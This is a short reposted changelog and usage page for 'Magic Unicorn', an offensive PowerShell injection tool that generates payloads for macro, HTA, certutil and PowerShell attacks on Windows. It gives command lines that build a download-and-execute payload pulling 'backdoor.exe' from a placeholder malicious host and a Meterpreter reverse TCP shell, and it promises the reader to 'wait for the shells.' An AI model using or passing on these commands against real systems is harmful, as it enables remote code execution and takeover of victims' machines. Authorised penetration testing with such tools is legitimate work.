Changelog version 2.3:
* added support for windows/download_exec as a payload option – just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe – note it doesn’t need to be an exe, whatever you want to download and execute
Magic unicorn Attack Vector v2.3
Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.
Requirements:
+ Metasploit Framework
Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERUTIL Attack Instruction
+ Custom PS1 Attack Instructions
Usage:
git clone https://github.com/trustedsec/unicorn && cd unicorn ./unicorn --help Update: cd unicorn git pull origin master Example use: python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443
Download : Master.zip | Clone Url
Source: TrustSec | https://www.trustedsec.com/ | Our Post Before
